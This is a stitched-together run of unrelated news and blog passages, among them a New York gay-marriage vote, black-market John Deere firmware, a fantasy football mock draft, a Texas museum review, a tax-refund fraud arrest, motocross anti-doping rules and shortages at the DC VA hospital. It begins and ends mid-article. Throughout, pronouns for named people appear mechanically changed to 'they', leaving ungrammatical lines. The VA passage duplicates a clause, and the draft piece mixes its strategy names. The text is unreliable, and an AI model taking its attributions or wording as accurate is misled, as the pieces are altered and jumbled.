And Republican Senate Majority Leader Dean Skelos told reporters in Albany that they would permit members of their party to vote for their conscience. “If they favor it, I've always said, they can vote for it,” they said as they headed into a meeting with Cuomo.
Republicans, Skelos said, are set to meet privately on Tuesday to decide whether to hold a vote. “We're going to have a serious discussion about it. It's a serious issue,” they said. “Many lives are affected by it, emotionally and personally, and we'll make the final decision.”
A gay marriage bill has already passed the Democratic-controlled Assembly but has never cleared the Republican-led state Senate in past years.
Meanwhile, gay rights advocates are already cautiously optimistic about the bill's potential success.
“Here is an example where a new governor with a divided legislature and a state facing its own economic hardships looks like they will be able to deliver in a pretty breathtaking way,” said Richard Socarides, president of Equality Matters and a former advisor to President Bill Clinton.
“New York sets trends and this is a trend, if it happens, that we hope would sweep the country,” they said.
Gay marriage is already legal in Connecticut, Iowa, Massachusetts, New Hampshire and Vermont. It was also briefly legal in California until voters passed Proposition 8, which is being challenged in federal court.
Two years ago, when Democrats had a majority in the Senate, a same-sex marriage bill fell 24-38. This time, though, it has the will of a forceful governor and polling that is more favorable than ever before.
A Quinnipiac University poll released earlier this month found 58 percent of New Yorkers supporting gay marriage, while 36 percent were opposed. Among Republicans, 34 percent said they would back legalized gay marriage, while 64 percent were opposed.
But there is still an effort by opponents to stop momentum on the bill.
The National Organization for Marriage last month pledged $1.5 million to mobilize opponents against the bill. The group was part of efforts to oppose gay marriage bills in Maryland and Rhode Island earlier this year and, “we expect the same in New York,” NOM president Brian Brown told The Associated Press in May.
A flourishing black market of John Deere parts exists online, connecting farmers in rural America with counterparts in Eastern Europe to buy unlocked firmware crucial to tractors. If you're surprised by the idea of Nebraska farmers working together with Ukrainian suppliers to defeat a tractor company, well, welcome to the bizarre fight over "right to repair."
Those who use the black market, documented in a report by Motherboard, claim they are driven to it by restrictive licensing agreement by Deere, one of the largest tractor companies in the world. Those restrictions would bar the tractors' users from fixing its hardware or software themselves, but such rules are currently being challenged by so-called "right to repair" legislation working its way various states at the moment, including farming-heavy Nebraska.
One reason right to repair has been such a contentious issue in ag states is that time is a crucial commodity since crops are reliant on seasons. "When crunch time comes and we break down, chances are we don't have time to wait for a dealership employee to show up and fix it," Danny Kluthe, a hog farmer in Nebraska, said during testimony to their state's legislature earlier this month. "Most all the new equipment [requires] a download [to fix]."
Right to repair legislation would invalidate John Deere's license agreement, updated last October, which has severe restrictions that prohibit nearly all repair and modification to farming equipment. Until then, Motherboard's reporter found "dozens of threads from farmers desperate to fix and modify their own tractors" online. The programs available on these forums range from diagnostic devices to data link drivers that allow computers to talk to tractors.
The company responded to the existence of the black market without specific comment, but noting the safety risks inherent in downloading such software. "Software modifications increase the risk that equipment will not function as designed," the company said. "As a result, allowing unqualified individuals to modify equipment software can endanger machine performance, in addition to Deere customers, dealers and others, resulting in equipment that no longer complies with industry and safety/environmental regulations."
Lydia Brasch, the state representative who introduced the Right to Repair legislation, told Popular Mechanics last month that farmer have known how to fix their tractors "for decades, generations even." That knowledge, as the very existence of the forms shows, has moved from the mechanical into the digital.
Source: Motherboard
Eric Moody analyzes the Zero WR strategy for the upcoming fantasy football season.
Can the Zero RB strategy help you dominate your fantasy draft? This was a question I answered in a previous article by walking our readers through Shawn Siegele's influential strategy via a mock draft. A fellow RotoViz writer Anthony Amico has been championing a strategy they call Robust RB. It is a strategy that is similar to Matthew Freedman's RB5x strategy, but with an emphasis on drafting running backs early instead of wide receivers. Here is an excerpt from Anthony's article discussing what prompted them to leverage this strategy:
Before starting, it is important to inform you that the purpose of this article is not to tell you that Zero RB is a bad strategy, or that it can't win leagues in 2016. It absolutely can. But in 2016, I'm going to be hunting for upside and drafting for the win through Zero WR.
Anthony goes on to build a rather compelling case in their article about how the strategy can help you win your league.
The purpose of this article is to leverage the FantasyPros Draft Wizard in order to display the use of Amico's Robust RB strategy in a 12-team PPR (points per reception) league via a snake draft. The Draft Simulator is an efficient way to practice for your upcoming fantasy football draft. It is similar to doing a live mock draft except that you are drafting against the FantasyPros computer algorithm (which uses a random selection of expert cheat sheets and ADP sources). For this article I selected the option to use the ADP (average draft position) from FantasyFootballCalculator.com. The starting lineup in this mock draft will consist of one quarterback, two running backs, two wide receivers, one tight end, one kicker, one defense, and one FLEX player (which can be a running back, wide receiver, or tight end). Each team will have eight bench spots. In this mock I will draft from the number three spot and provide brief analysis on my selections.
Start preparing for your league now with our NFL Draft Simulator >>
Round 1
Todd Gurley
Gurley is a once in a decade talent who missed the first three games of the 2015 season but still finished as a top five fantasy running back. Gurley produced 0.75 fantasy points per touch last season. They played 456 offensive snaps and touched the football on 54.8 percent of them. Gurley was given 30 carries inside the 20-yard line. The Rams will remain a run-heavy offense in 2016, and they are one of the few true workhorse backs in the NFL.
Round 2
Mark Ingram
Ingram played on 535 of the Saints offensive snaps and touched the football or was targeted on 42.2 percent of them. They were finally used as a three-down back and set a career high in total yards (1,174) and targets (60) last season. Ingram's season was cut short due to a shoulder injury, but at the time of the injury they were a top three running back in PPR formats. Ingram had 32 carries inside the 20-yard line.
Round 3
Eddie Lacy
Lacy is one of my favorite bounce-back candidates in 2016.  They are entering a contract year and is financially motivated to produce a monster season in order to land a career-defining contract. The return of Jordy Nelson will allow the Packers' offense to return to form. Back in 2014, the Packers' offense scored 2.63 points per drive, with 45 percent of their drives reaching the red zone, and once in the red zone the team scored a touchdown on 67 percent of them. Lacy set a career low in offensive snaps played (471), rushing attempts (187), rushing yards (758), and rushing touchdowns (3) in 2015. They have the potential to finish 2016 as a top five fantasy running back.
Round 4
Latavius Murray
Murray was one of seven running backs with 1,000 or more rushing yards in 2015.  They are entering a contract year and is financially motivated to produce a monster season in order to land a career-defining contract. Murray was a victim of negative game script week in and week out. The Raiders defense gave up 1.92 points per drive. Murray produced 0.53 fantasy points per touch and was given 34 carries inside the red zone, but was inconsistent the second half of the season. The Raiders drafted running back DeAndre Washington in the fifth round of the 2016 NFL Draft. They may be used on passing downs or give Murray a breather on early downs. All of these factors have driven Murray's ADP down since the NFL Draft. The Raiders have made major changes on the defensive side of the football which could positively impact the offense and Murray. Washington does pose a threat to Murray, but it is a risk worth taking for my fourth running back.
Round 5
Giovani Bernard
Last season Bernard actually outscored Jeremy Hill in fantasy points in PPR formats (Hill outscored Bernard as a rookie in 2014). The Bengals lost Marvin Jones and Mohammad Sanu to free agency. The team has also lost Tyler Eifert earlier this year after they suffered an injury in the Pro Bowl. Now the Bengals are dealing with an injury to tight end Tyler Kroft. I anticipate Bernard will catch a high number of passes as the third receiving option. They (1,095) has played more offensive snaps than Hill (964) over the last two seasons. This will be the season Bernard truly distances themselves from Hill. They have a higher DYAR (Defense-adjusted Yards Above Replacement) and DYOA (Defense-adjusted Value Over Average) than Hill according to Fantasy Outsiders. The easiest way to describe it: DYAR means a running back with more total value. DVOA means a running back with more value per play.
Bengals RB DYAR and DVOA from 2015
Player Team DYAR RB Rank DYAR DVOA RB Rank DVOA Giovani Bernard Bengals 10 131 8 11.8% Jeremy Hill Bengals 16 85 21 0.1%
Source: FantasyOutsiders.com
Round 6
John Brown
Brown has the highest floor of any of the Cardinals' wide receivers. Larry Fitzgerald was the only Cardinals' receiver to play more offensive snaps and produce more fantasy points than Brown. They produced 2.19 fantasy points per reception last season despite only having three double-digit target games last season. Brown is my candidate to lead the Cardinals in receiving yards in 2016.
Round 7
DeSean Jackson
Jackson is another wide receiver that is criminally undervalued. They dealt with a shoulder injury last season and is only a season removed from finishing as a top 20 fantasy wide receiver. Jackson is still the No. 1 wide receiver in the Redskins' explosive offense. They provide fantasy owners with week-winning upside anytime Jackson is in your starting lineup. This article I wrote for RotoViz provides you a more detailed analysis of Jackson's outlook in 2016.
Round 8
Torrey Smith
Smith continues to be touted as a breakout candidate heading into 2016 as the No. 1 wide receiver in 49ers head coach Chip Kelly's offense.  They are another wide receiver that is undervalued. Smith will be in a position to recreate the fantasy fireworks that DeSean Jackson and Jeremy Maclin created back in 2013 and 2014. Both players finished the season as top 10 fantasy wide receivers.
Round 9
Tyler Lockett
Lockett's ADP continues to rise after NFL.com writer and Reception Perception creator Matt Harmon has tapped them as a breakout candidate (for those who don't know they were pounding the drum for Allen Robinson heading into the 2015 season). They had finished the season on a positive note as the Seahawks' offense finally gave quarterback Russell Wilson the keys to the car. Lockett had 40 reception, 404 receiving yards, and five touchdowns from Week 11 until the end of the season.
Round 10
Sterling Shepard
Shepard is essentially a lock to open the 2016 season as the Giants No. 2 wide receiver opposite Odell Beckham. They inherit a role previously held by Rueben Randle who had 90 targets and played 89.4 percent of the Giants' offensive snaps last season. Shepard will likely face single coverage a high percentage of the time they are running routes due to the defensive attention Beckham warrants. The Giants' offense scored 2.03 points per drive (the eighth highest among NFL teams) and tied the Patriots for the most passing touchdowns (36) in 2015. This is an offense you want to own a piece of on your fantasy football team this season.
Round 11
Martellus Bennett
All of the feedback from reporters covering the Patriots suggest that Bennett is primed for a big passing game role with the team. The Patriots are known for leveraging the tight end position and outside of Rob Gronkowski and Julian Edelman have few dependable options. The Patriots have run a high number of two tight end sets and special packages in the red zone in the past. Gronkowski and Bennett are squarely in their physical prime. I anticipate seeing this type of production from the Patriots tight ends moving forward.
Bennett will fill the role that Aaron Hernandez excelled in from 2010 to 2012.  They are very effective in the open field with making opposing defenders miss. According to Pro Football Focus, there have only been three tight end seasons with 20 or more forced missed tackles. Hernandez (1) and Bennett (2) are the only tight ends with a seat at this table.
Round 12
Michael Thomas
Thomas was targeted by the Saints' front office to inherit the role of the “big slot receiver” that Marques Colston excelled at throughout their career. They have gotten rave reviews from quarterback Drew Brees and local reporters about how they are acclimating to the Saints offensive scheme. Thomas will have an immediate role in the offense as the number three wide receiver. Bree has attempted 600 or more passes each season since 2010. They have consistently thrown 32 or more touchdowns each season over that time frame.
Thomas is inheriting a role that averaged 6.8 targets per game, a target share of 0.16, and a 0.06 touchdown rate over the last four seasons. They have a WR3 floor with WR2 upside in 2016.
Round 13
Kirk Cousins
Cousins was a great fit for Redskins head coach Jay Gruden's offensive scheme. They finished as a top 10 fantasy quarterback last season. Cousins' performance during the fantasy playoffs [Weeks 14 (21.30 fantasy points), Week 15 (35.86) and Week 16 (32.20)] helped many owners win championships in 2015.  They are entering a contract year after not being able to negotiate a deal with the Redskins' front office. Cousins is financially motivated, has elite receiving weapons, and a questionable running game. What is there not to be excited about given this scenario? Cousins is one of my favorite quarterbacks to target in the later rounds.
Round 14
Devin Funchess
Funchess is in a prime position to break out in 2016 lining up opposite Kelvin Benjamin. They just turned 22 back in May of this year. Funchess took the majority of their rookie season to get adjusted to life as an NFL wide receiver. Even if the Panthers' offense regresses this season they are still a prime candidate to greatly outperform their ADP.
Round 15
Spencer Ware
Ware is a lottery ticket in the scenario that Jamaal Charles misses time in 2016. They recently signed a two-year, $3.6 million dollar extension and is listed as the Chiefs No. 2 running back. Ware outperformed Charcandrick West in many statistical categories from an efficiency standpoint.
Round 16
Buffalo Bills DST
Round 17
Justin Tucker
Conclusion
This mock draft provides you a sense of what a Zero WR team could look like. The foundation of the team revolves around a strong core of running backs with the intent of starting a back in the FLEX each and every week. The wide receiver core is centered around undervalued players who have WR1 upside on any given week and are connected to high-performing offenses. I prefer to draft a late-round quarterback with upside. The top three fantasy quarterbacks in 2015 averaged 22.2 points per game.
The key to executing this strategy or Zero WR in live fantasy drafts is to be fully committed to the strategy. You want to refrain from drafting a wide receiver in the high-leverage rounds (one through five). The only scenario you would want to alter your strategy is if you find an unimaginable value (Ex. Dez Bryant in the fourth round).
Amico has also written a three-part series (Part 1, Part 2, and Part 3) at RotoViz to complement their Robust RB strategy that revolves around what wide receivers to target if you plan to execute the strategy.
The Lone Star State is filled with things to be proud of. One of the factors that contributes significantly to Texas pride is the deep and rich history of the state. If you're trying to convince your friends that Texas really is the best place in the world, the Bullock Texas State History Museum is for you.
Here are my top five reasons why the Bullock Texas State History Museum is worth experiencing:
1) It is beautiful. Right away, I noticed the giant lone star in its courtyard. The Lone Star symbol came about during the Texas Revolution in the mid-1830s, when Texas won its independence from Mexico. Today, it remains a manifestation of independence and the Texan fighting spirit.
Powerful without being ostentatious, the museum's star says a lot about the Texas state of mind. I could not help but gawk at its elegance and size.
Behind the star is the larger-than-life museum. Massive stone pillars run from floor to ceiling, interspaced by crystal clear windows. I half-expected to find Zeus and their pantheon dining inside.
Upon further inspection, I learned that the museum is made from the same type of stone as the Texas State Capitol Building. It is called “sunset red” granite, and it is giving both buildings their peculiar reddish-pink tones.
2) The museum contains the only IMAX theater in Austin, the biggest in Texas. It centers around films about Texas history. However, there are films about dinosaurs, undersea life and other things as well. This IMAX theater also hosts mainstream movies like Avatar and Inception.
The film I watched instantly absorbed me. They were showing a 3-D film about tornado chasers. Every unfortunate dairy cow flew through the air and straight for the audience as tornadoes formed and touched down. We all left the theater with a deep respect for storm chasers and cinematic storytelling.
3) The exhibits start with prehistoric man and lead you up to the Apollo moon landing…literally. I started at the ground floor and walked clockwise until I reached the last exhibit on the third floor. Every step took me a little further through Texas history.
I marveled at the ingenious tools used by early hunter-gatherers before walking to the Native American area. I sat inside a teepee and watched a documentary about the relationship between Native Americans and European settlers. Next to the teepee was a homesteader's shanty. Within it, people listened to the journals of American pioneers. Both the adults and children watched various parts of the cabin light up as each story was read aloud.
4) The museum is remarkably interactive. After a short staircase (there are elevators as well) it was 1883 and I sat in a Mexican prison cell with Stephen F. Austin. We broke out, but soon the Civil War was upon me. A house divided then rebuilt itself. Next came the fight for women's suffrage, the Texas oil boom and the Great Depression. Suddenly war came from across the ocean.
Near the end of the exhibits sits a Fighting Corsair WWII plane, the Navy's first 400 mph fighter plane. The trip ended with an astronaut sticking an American flag into the surface of the moon.
5) It is the perfect place to spend an afternoon. After the exhibits, I caught a bite to eat from the museum cafe. The Story of Texas Cafe offers everything from carne guisadas to catfish. They also serve lighter meals like soups and sandwiches. Luckily for the coffee nuts like myself, the cafe has multiple styles of coffee on hand. They even serve Texas brews!
The employees and volunteers genuinely love the museum. They are happy to chat and know a lot about the exhibits. The museum rouses a thousand different questions, and somebody is always available with an answer.
All things considered, the Bullock Texas State History Museum is one of my favorite Austin locations.
Dusty asks:
Have you been to the Texas State History Museum? Do you have a favorite exhibit?
Photos by John Rogers, cytosine, Jamie Campbell, and Srinath TV, respectively.
***
Austinot Giveaways
We always have unique content on the Austinot, and we love to give things away. We only send out our Best of the Austinot newsletter 2 times a month. It's where we give you a recap of our best articles and where we give stuff away. Interested? Subscribe to Best of the Austinot here!
This is starting to become a familiar trend, isn't it?
Meet the Press host Chuck Todd has been pushing and pushing Mark Pryor and Tom Cotton to debate each other one-on-one in Arkansas. They even pledged to make the trip down to the Natural State themselves to serve as moderator. Cotton, for their part, has accepted. Their opponent ... has not.
“Everything else is happening in this race. Plenty of TV ads, plenty of attacks going on back and forth…let's see them sit down and have a debate,” Todd said in an interview with KARK 4 News last week. “I think you owe it to the viewers.”
It's worth repeating and reiterating that the Pryor campaign has already accepted two debate invitations (one of which Cotton has so far declined). So it's inaccurate to portray Mark Pryor as a debate dodger in the same sense Mark Udall is. Nonetheless, like Sen. Jeanne Shaheen in New Hampshire, he's not exactly sanguine about the prospects of adding more one-on-one debates to their calendar.
As Todd notes, this is a disservice to Arkansans who are unfairly bombarded with misleading attack ads that distort and slander candidates' positions. One would think, therefore, that both candidates would relish the opportunity to debate one another in public as often as they could. Apparently not.
hits Pryor for voting for Obamacare; the other hits Cotton for not protecting women, or something:
0 Woman arrested for allegedly seeking fake $94 million tax refund
COBB COUNTY, Ga. - State investigators have arrested a woman accused of seeking a tax refund of more than $94 million.
Now investigators say they are looking for the woman's relative, whom they say also filed a fake tax return.
Channel 2 Action News was at a Cobb County supermarket as Brigitte Jackson was arrested at the bank counter inside the store.
“It doesn't matter if it's $94 or $94 million. We're going to go after you and hold you accountable,” said Georgia Department of Revenue Special Investigations Chief Josh Waites.
Investigators said Jackson tried to trick the state into paying them the fake $94 million tax refund. But investigators said they stayed one step ahead.
Waites said investigators asked Jackson to come to the supermarket to pick up their $94 million refund check. That's when they were arrested.
 They are facing five charges, including attempted theft by taking and conspiracy to defraud the state.
Waites said Jackson's relative, Darrius White, like her, reported $99 million in income, tried to claim a mammoth refund and now faces the same charges.
Agents and police went to what turned out to be a former address and did not find White.
Waites said White is already on felony probation.
Fraud detection manager Kendra Carroll told Winne they spoke to a man who identified themselves as Darrius White by phone about their alleged refund request earlier this week.
DOR financial fraud analyst Tamiko Harris said a call from Bridgitte Jackson was routed to them earlier this month.
“They kept calling to check on their refund,” said Waites.
Their phone calls were recorded, and Waites said that helped investigators bring criminal charges.
The Jump start Our Small Business Startups (JOBS) Act legislation went into effect last week, opening up the ability for companies to raise funding publically and marking the beginning of the crowdfunding era in fundraising for startups.
Voodoo Ventures, the internet incubator based in New Orleans, has announced the launch of its syndicates program through AngelList. The syndicate functionality allows you to invest on behalf of or with other co-investors.
“It's really interesting what's happening with early stage capital right now,” said Chris Schultz, Founder of and investor through Voodoo Ventures.
Voodoo Ventures will be looking for the best deals on a national basis, according to Schultz. Syndicates open up the opportunity for investors in New Orleans to participate on a case by case basis.
“It removes the challenge with being a VC fund because you do the deal as they come along and when you see good deals.”
At this time the syndicate program is only available to accredited investors. To get started, apply to be an accredited investor on AngelList, back Schultz on AngelList and then you'll be notified when we syndicate a new investment and have the opportunity to participate.
Following Schultz on AngelList does not indicate any commitment to invest, that happens on a deal by deal basis. Voodoo Ventures will take a 15% carry and AngelList takes a 5% carry and their minimum investment will be $12,500 per deal. Co-investors must put in a minimum of $2,500 per deal.
“I think this will open up new sources of capital, in particular angel investors who haven't come off the sidelines and who will be more confident.”
“Personally, I'm really excited about the world this opens up,” said Schultz. “ For years, I've had people in New Orleans say ‘I'm interested in investing, but I don't have time to evaluate all the dealflow, but I'm interested in investing in the deals you invest in.' Previously, the only scalable way to do that was for us to raise a fund for Voodoo Ventures, which is something I haven't wanted to do, because I prefer to invest as an angel, I am an entrepreneur running other businesses, not a full time investor.”
The AMA had never had to deal with riders failing a drug test —even though the Supercorss series had sporatically tested over the past few years (and the Nationals started in 2014), but when James Stewart failed a drug test during last year's Supercross series the world exploded. Stewart is still waiting to hear their penalty (which will be decided eventually by the FIM—because Supercross is both an AMA and FIM series). You have to wonder what's taking so long for Bubba to get an answer to the question that should hav been resolved three months ago. You might also wonder what the goal of drug test is in sports — it's done to….
(1) Promote motocross as a drug-free sport;
(2) Uphold and preserve the ethics of Sport;
(3) Ensure that all athletes have an opportunity to compete equally; and
(4) Safeguard the physical health and mental integrity of our athletes.
To that end, the USADA and WADA conduct both in-competition and out-of-competition testing of Pro motocross athletes, to include both blood and urine testing. Athlete selection is based on podium finishes (top 3) plus random selection. Hence, athletes who earn a podium position will be subject to testing.
Athletes using medications or prohibited substances for medical reasons are required to obtain a Therapeutic Use Exemption (TUE) prior to use in sport—something Stewart failed to do. Athletes using dietary supplements must exercise extreme caution, as supplements are not regulated, and athletes assume the risk of testing positive and of potential, adverse health consequences if they choose to use supplements. The use of supplements is at the athlete's own risk. Information on supplements and to determine if a specific supplement may pose a risk can also be found at the USADA website link below.
Athletes must also be cautious of some energy drinks, as they may contain stimulants that are on the WADA Prohibited List, and could cause a positive anti-doping test. Know what you are drinking – check out the link below.
The penalties for Blood Doping are severe – a two year suspension from competition. Penalties for other offenses vary depending on the violation and substance.
It's important to note that the riders and their team mangers are responsible for reading, understanding and adhering to the banned drug rules. Go to www.mxsportsproracing.com/pages/administration/anti-doping to get link to all the info.
SUBSTANCES PROHIBITED AT ALL TIMES (BOTH IN- AND OUT-OF COMPETITION)
Anabolic Agents: Anabolic Agents are prohibited. This includes the use of prescription testosterone creams (such as Androgel) or injections, or the use of any other anabolic substance (such as DHEA in a dietary supplement). The list of anabolic agents is extensive and even if an anabolic agent is not specifically listed, it is still prohibited if it has “a similar chemical structure or similar biological effects.”
Peptide Hormones: Growth Factors, and Related Substances: This class of substances includes erythropoietin (EPO), human chorionic gonadotropin (HCG), luteinizing hormone (prohibited in males only), growth hormone, insulin-like growth factor-1 (IGF-1), corticotrophins, and a number of other growth factors. The definition of growth factors includes any “growth factor affecting muscle, tendon, or ligament protein synthesis/degradation, vascularization, energy utilization, regenerative capacity or fiber-type switching.
Beta-2 Agonists: All oral (taken by mouth and swallowed) beta-2 agonists are prohibited. Inhaled beta-2 agonists are prohibited and require a Therapeutic Use Exemption (TUE), except for albuterol (dosages under 1600 micrograms/24 hours), formoterol (dosages less than 54 micrograms/24 hours), and salmeterol (when taken according to manufacturer's instructions). If you use more than the amounts listed in the table below, you are required to submit a TUE for use. Search GlobalDRO.comto determine if the inhaler that you are using contains a substance that requires a TUE for use in sport.
Hormone and Metabolic Modulators: In short, the following are prohibited: aromatase inhibitors, selective estrogen receptor modulators (SERMs), other substances that block estrogen effects (anti-estrogens), and agents modifying myostatin function(s), and insulin. Please consult the Prohibited List for examples of substances in each of the above classes.
DIURETICS AND OTHER MASKING AGENTS:
Masking agents: Masking agents are prohibited, including diuretics (water pills) and plasma expanders, which increase blood volume. WADA has clarified that drospirenone, pamabram, topical dorzolamide and brinzolamide, and the local administration of Felypressin for dental anesthesia are not prohibited.
Manipulation of Blood and Blood Components: Blood doping, the use of red blood cells from any source, or otherwise artificially enhancing the uptake, transport, or delivery of oxygen, is prohibited. Any type of intravenous (IV) manipulation of the blood or blood components by physical or chemical means is prohibited.
Chemical and Physical Manipulation: Tampering or attempting to tamper with a collected sample in order to affect its validity is prohibited.
Intravenous infusions: Any intravenous injection of more than 50mL per a six-hour period are prohibited except for those legitimately received in the course of hospital admissions or clinical investigations.
Gene Doping: The transfer of polymers of nucleic acids or nucleic acid analogues, or the use of normal or genetically modified cells is prohibited.
SUBSTANCES AND METHODS PROHIBITED IN-COMPETITION ONLY
Stimulants: All stimulants and their optical isomers (d, l) when they exist are prohibited, except for imidazole derivatives for topical use and those stimulants on the 2014 Monitoring Program (buproprion, caffeine, nicotine, phenylephrine, phenylpropanolamine, pipradrol, psuedoephedrine over 150 microgram/L, and synephrine).
Narcotics: Certain narcotics are prohibited in-competition: buprenorphine, dextromoramide, diamorphine (heroin), fentanyl and its derivatives, hydromorphone, methadone, morphine, oxycodone, oxymorphone, pentazocine, and pethidine (meperidine). Use of these narcotics in-competition requires an approved TUE. Opium, the latex extract of the poppy plant, contains morphine and therefore it is also prohibited. Hydrocodone, mitrgynine, tapentadol and tramadol are in the monitoring program and are not prohibited.
Cannabinoids: Natural or synthetic tetrahydrocannabinol (THC) and THC-like cannabinoids (e.g. hashish, marijuana, Spice, JWH018, HU-210) are prohibited. Athletes who choose to consume hemp products may be at risk for a positive anti-doping test, even though many of these products claim not to contain THC. While the use of medical marijuana may be decriminalized in some states, it is still illegal under Federal Law. Currently USADA will only consider TUE applications for legal, FDA-approved uses of THC, such as Dronabinol to manage some of the symptoms of AIDS, or to treat nausea and vomiting caused by cancer chemotherapy.
Glucocorticosteroids: The systemic use of glucocorticosteroids (often called “steroids” by the prescriber) is prohibited in-competition. This includes oral intake (like a Medrol Dose Pak), a systemic injection by IV or intramuscular (IM), or by rectal routes.
The Prohibited List can be downloaded at www.GlobalDRO.com.
Amazon has acquired Orange County based games company Reflexive for an undisclosed sum.
Founded in 1997, Reflexive has developed 15 games for the PC, Xbox 360 and Mac, and offers flash based games through their Reflexive Arcade website. In 2005, Reflexive's Wik and the Fable of Souls won 3 awards at the 2005 Independent Games Festival.
Founder LarsBrubaker noted in a post on the Reflexive website that the acquisition will give the company better access to Amazon's distribution channels:
It means we'll be able to expand our distribution network to include Amazon's amazing distribution channel. With Amazon we will bring a huge new group of customers into play.
Ållen Stern at Centernetworks notes that gaming is still a hot vertical today, and it's a great space to be in.
(with help from Wikipedia)
At the main health-care facility for veterans in the nation's capital, doctors have had to halt operating room procedures and dialysis treatments in the past year because of a lack of supplies, nurses have frantically run through the facility hunting for nasal oxygen tubes during an emergency, and sterile surgical items have been left in dirty or cluttered supply rooms, according to a new report.
Conditions at the Washington DC VA Medical Center were so troubling that the Department of Veterans Affairs' inspector general released a condition at the Washington DC VA Medical Center were so troubling that the Department of Veterans Affairs' inspector general released a rare interim report Wednesday saying they are conducting a probe of the facility but did not want to wait for its completion to warn the public.
“We have not seen anything quite like this at a VA facility,” said Inspector General Michael J. Missal. “They have no inventory system. They don't know what they have or what they are going to need.”
“Hospitals are typically chaotic places,” they told The Washington Post, “but this was the highest levels of chaos. Staff was literally scrambling every day. Sometimes they would have to go to other hospitals to get equipment as a procedure was going on.”
Missal said they also had a second motivation for going public: Investigators had determined that VA had known about some of the deficiencies for years, and therefore the inspector general had a “lack of confidence” that the agency would quickly address the problems.
The report had an immediate impact. VA Secretary David Shulkin said they ordered that the head of the medical center be reassigned to duties elsewhere and that a member of their senior staff, retired Army Col. Lawrence Connell, would take over as acting director of the medical center to oversee improvements.
“When I became aware that veterans were at risk, that's when we took immediate action,” Shulkin said in a Thursday news conference. “If there are veterans who have been harmed, we are going to find out about that and find the people accountable.”
The Washington DC VA Medical Center, a sprawling campus along North Capitol Street and adjacent to the MedStar Washington Hospital Center, provides care to almost 100,000 veterans from across the region.
The investigation into problems at the facility began in March with a tip from a confidential informant, according to the inspector general's report. Most of the problems investigators subsequently found centered on inadequate staffing and scant attention to medical supplies.
The medical center has a 100,000-square-foot storage facility and 25 satellite storage areas containing an estimated $150 million in medical supplies, but staff members have not inventoried materials in more than a year and therefore cannot find items when needed, the report said. In some instances, the facility can't verify whether doctors are using products that may have been recalled or have expired.
A lease on the central facility is set to run out in less than three weeks, and VA appears to have made no provisions for relocating supplies. At 18 of the satellite areas, VA was storing surgical instruments and other items in dirty or cluttered rooms, the report said.
The logistics failures routinely affected patient care, inspectors found.
Last month, the medical center ran out of bloodlines for dialysis treatment and could only perform the procedure by borrowing supplies from a private hospital.
On March 29, a nurse wrote in an email that during an acute episode with a patient, they could not find tubes in their unit's storage area to insert into a patient's nose to provide oxygen.
On April 10, the operating room staff had to halt vascular surgeries because it had run out of patches used during the procedures, despite having requested a resupply two weeks earlier.
Also this week, the inspector general's office learned that other surgical operations were ongoing even though the hospital had run out of compression devices to place on patients' legs to prevent blood clots from forming.
The interim report identified almost 200 instances in which equipment shortages may have affected patient safety.
In a message to the 2.2 million members of the American Legion, National Commander Charles E. Schmidt thanked the VA whistleblower for spurring the investigation. Schmidt said they found the quick action of the Trump administration encouraging, and they used the incident to call on Congress to fully fund veteran-health-care needs.
Shulkin said they were not aware of any instances in which veterans were harmed but promised a digital inventory system would be in place at the D.C. facility by Monday and that care for veterans in D.C. would improve.
Shulkin did not name the medical center director who was relieved of their command, but the center's website Wednesday listed the director as Brian Hawkins. A call to a phone number listed for Hawkins was not immediately returned. Shulkin said it was too soon to assign responsibility for the problems uncovered by the inspector general.
local dc-politics Dallas shooting updates News and analysis on the deadliest day for police since 9/11. post_newsletter353 follow-dallas true endOfArticle false Local Headlines newsletter Daily headlines about the Washington region. Please provide a valid email address. Sign up You're all set! See all newsletters
According to the report, several senior positions below medical director, including a chief of logistics, a head nurse and other top slots, had remained vacant, in some cases for years.
VA has temporarily moved human resources responsibilities for hiring for the D.C. medical center to its Baltimore medical center. “Many VA medical centers have a really hard time hiring, but this seems worse than the others,” Missal said.
The inspector general said a focus of their investigation will be determining how the situation was allowed to deteriorate and remain that way.
Rep. Tim Walz (Minn.), the ranking Democrat on the House Veterans' Affairs Committee, called on their committee to investigate, characterizing the inspector general's findings as “outrageous and unacceptable.”
“When you have systemic failure on this level, management must be held accountable,” they said.
Once Upon a Time could look a bit different if renewed for Season 7.
As ABC ponders a possible renewal, the numbers for Season 6 thus far tell this story: averaging 3.5 million weekly viewers and a 1.1 demo rating (in Live+Same Day numbers), Once is down 30 percent from this time last year, and currently ranks sixth among the network's dozen dramas. As such — and with the contracts for Jennifer Morrison (read story) and other key cast members due for renewal this spring — there has been evidence that a “reset” of sorts is on the drawing board, should the show get renewed.
Having heard from series creators Adam Horowitz and Edward Kitsis some “interesting” potential ideas for the future, ABC entertainment president Channing Dungey recently told our sister site Deadline, “Regardless of what we decide to do … I think [Adam and Eddy] would put a little bit of a bow here” — what they later called “closure in this particular narrative” — “and then there is a ‘next piece' that comes after that. So they are trying to figure out what that [next piece] is and how that works.”
Dungey similalry suggested that Season 7 could offer “a springboard in a new direction from a narrative standpoint,” in a talk with EW.com. “[That] doesn't necessarily mean that we're not bringing cast back, it's just: How do you kind of hit the reset button in a way that gives you opportunity to expand the stories that we're telling?”
Along those lines, TVLine now has a first bit of intel on how the series' current run (resuming Sunday, March 5) will end, and in doing so tee up any possible Season 7.
Namely, the May finale will introduce a pair of guest stars, both of whom have the potential to join the ensemble as series regulars if the show moves forward. First up, the fantasy drama is casting a “strong yet vulnerable” leading man in their late 20s to mid-30s, a gent who was once optimistic and hopeful but now is a friendless, cynical recluse. That said, they still possess a dormant, deep-seated spark of hope that waits for the right person to reignite it.
The other role being cast is a precocious 10-year-old with a “constant twinkle of mischief in their eye.” And though this girl comes from a broken home, those struggles have only made them stronger — something which will come in handy when darkness threatens “everything they hold dear.” And while the character breakdown notes that this lass “never lets the hard knocks of life get them down,” you would be wrong to guess that they are a certain little orphan named Annie.
What is your theory on Once Upon a Time's tweaked narrative plan for any possible Season 7, and how these two noobs figure into it?
Last year, on the eve of the NWSL championship—that's the National Women's Soccer League, our professional league—I wrote a post about the conditions we were working under in an effort to show people just how much the players in the NWSL give and give up to support and build this league. I didn't run it at the time because I hoped that the many, many things about our league that needed to get better would get better, especially after we'd just won the World Cup.
They haven't.
Sunday's game between my team, the Seattle Reign, and the Western New York Flash, where both teams were forced to play in the outfield of a baseball field, on a field that was dangerously narrow, and absurd for a professional team to play on, was an outrageous example of what we as players deal with on an ongoing basis.
